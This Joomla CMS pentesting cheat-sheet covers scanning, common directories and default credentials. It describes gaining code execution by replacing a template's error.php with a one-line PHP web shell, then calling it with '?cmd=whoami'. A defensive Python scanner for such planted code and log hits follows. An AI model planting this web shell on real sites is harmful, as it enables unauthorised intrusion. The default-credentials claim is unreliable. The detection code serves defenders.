Joomla CMS Pentesting

Joomla is a content management system (CMS).

- [cmsjunkie](https://www.cmsjunkie.com/blog/post/understanding-the-joomla-directory-structure)

Scan

joomscan -u https://example.com


Common Directories

/administrator/
/administrator/manifests/files/joomla.xml
/cache/
/components/
/configuration.php
/htaccess.txt
/includes/
/index.php
/joomla.xml
/language/en-GB/en-GB.xml
/libraries/
/LICENSE.txt
/logs/
/media/
/modules/
/plugins/
/README.txt
/templates/
/tmp/
/web.config.txt


Default Credentials

The default username is "admin" with no password.


RCE

Reference: HackTricks

If we have admin credentials, we may be able to execute arbitrary code by editing the site template.

1. Login as Admin

First, go to the /administrator page and log in with the admin credentials.

2. Select Template

In the dashboard, go to the template selection menu and click a template name. The list of the template's files appears in the left menu.
Here we edit error.php, so click it in the left menu.

3. Inject Arbitrary Code

In the editor for error.php, delete the original PHP code and insert arbitrary PHP code such as:

<?php system($_GET['cmd']); ?>

If we want a shell on the target, we can insert the code for a reverse shell instead. Please see the Web Reverse Shell page for details.
After that, click Save & Close.

4. Execute

Now access the template's error.php page as below:

https://example.com/templates/<template_name>/error.php
# or
https://example.com/templates/<template_name>/error.php?cmd=whoami
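A defender-side check for the template-editing vector above, added here as an example and not part of the original page: it flags PHP files under templates/ that hand request input to command-execution functions, and access-log lines that request a template's error.php directly with a query string. The template name, file contents and log lines are constructed samples.

```python
import re
from pathlib import Path

# Functions that run OS commands or evaluate code; a template file should
# never pass request input to any of them.
DANGEROUS = r"(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# A dangerous call whose argument list reads a request superglobal,
# e.g. system($_GET['cmd']).
INJECTED_CALL = re.compile(rf"\b{DANGEROUS}\s*\([^;]*?{REQUEST_INPUT}", re.I)
# A direct request to a template's error.php carrying a query string; Joomla
# includes error.php itself, so browsers have no reason to request it this way.
TEMPLATE_ERROR_HIT = re.compile(r'"(?:GET|POST) (/templates/[^/ ]+/error\.php\?[^ ]*)')

def find_suspicious_php(source):
    """Return (line_no, line) for lines where request input reaches a dangerous call."""
    return [(n, l.strip()) for n, l in enumerate(source.splitlines(), 1)
            if INJECTED_CALL.search(l)]

def scan_templates(root):
    """Scan every PHP file under <root>/templates; map relative path -> hits."""
    findings = {}
    for path in Path(root, "templates").rglob("*.php"):
        hits = find_suspicious_php(path.read_text(errors="replace"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings

def find_template_error_requests(access_log):
    """Return (client_ip, request) for parameterised hits on templates/*/error.php."""
    hits = []
    for line in access_log.splitlines():
        m = TEMPLATE_ERROR_HIT.search(line)
        if m:
            hits.append((line.split()[0], m.group(1)))
    return hits

# Constructed sample data (not taken from a real site or log).
SAMPLE_ERROR_PHP = """<?php
defined('_JEXEC') or die;
system($_GET['cmd']);
?>"""
SAMPLE_LOG = """203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /templates/cassiopeia/error.php?cmd=whoami HTTP/1.1" 200 41
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /templates/cassiopeia/css/template.css HTTP/1.1" 200 9000"""

if __name__ == "__main__":
    print(find_suspicious_php(SAMPLE_ERROR_PHP))
    print(find_template_error_requests(SAMPLE_LOG))
```

Run scan_templates against the Joomla web root on a schedule and compare results with a known-good baseline; any new hit in templates/ is a strong sign the template editor has been used to plant code.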